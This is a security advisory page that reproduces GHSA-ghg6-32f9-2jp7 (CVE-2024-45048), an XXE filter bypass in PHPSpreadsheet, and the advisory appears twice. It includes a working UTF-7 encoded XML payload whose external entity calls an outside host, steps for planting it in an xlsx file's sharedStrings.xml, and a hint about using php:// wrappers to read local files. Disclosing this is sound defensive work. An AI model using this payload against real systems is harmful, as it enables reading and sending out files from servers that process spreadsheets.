Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-ghg6-32f9-2jp7: XXE in PHPSpreadsheet encoding is returned

Summary

Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack)

Details

Check $pattern = '/encoding="(.*?)"/'; easy to bypass. Just use a single quote symbol '. So payload looks like this:

<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]>

If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute.

PoC

  1. Create simple xlsx file
  2. Rename xlsx to zip
  3. Go to the zip and open the xl/sharedStrings.xml file in edit mode.
  4. Replace <?xml version="1.0" encoding="UTF-8" standalone="yes"?> to
<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]>
  1. Save sharedStrings.xml file and rename zip back to xlsx.
  2. Use minimal php code that simply opens this xlsx file:
use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
  1. You will receive the request to your http://%webhook%/file.dtd
  2. Dont’t forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.

Impact

Read local files lfi

ghsa
Open in Source
#web#git#php

Summary

Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack)

Details

Check $pattern = '/encoding="(.*?)"/’; easy to bypass. Just use a single quote symbol '. So payload looks like this:

<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"> %xxe;]>

If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute.

PoC

  1. Create simple xlsx file

  2. Rename xlsx to zip

  3. Go to the zip and open the xl/sharedStrings.xml file in edit mode.

  4. Replace <?xml version="1.0" encoding="UTF-8" standalone="yes"?> to

    <?xml version="1.0" encoding=’UTF-7’ standalone="yes"?> +ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"> %xxe;]>

  1. Save sharedStrings.xml file and rename zip back to xlsx.

  2. Use minimal php code that simply opens this xlsx file:

    use PhpOffice\PhpSpreadsheet\IOFactory; require DIR . '/vendor/autoload.php’; $spreadsheet = IOFactory::load(“file.xlsx”);

  1. You will receive the request to your http://%webhook%/file.dtd
  2. Dont’t forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.

Impact

Read local files

References

  • GHSA-ghg6-32f9-2jp7
  • https://nvd.nist.gov/vuln/detail/CVE-2024-45048
  • PHPOffice/PhpSpreadsheet@bea2d4b

ghsa: Latest News

GHSA-pxg6-pf52-xh8x: cookie accepts cookie name, path, and domain with out of bounds characters
ghsa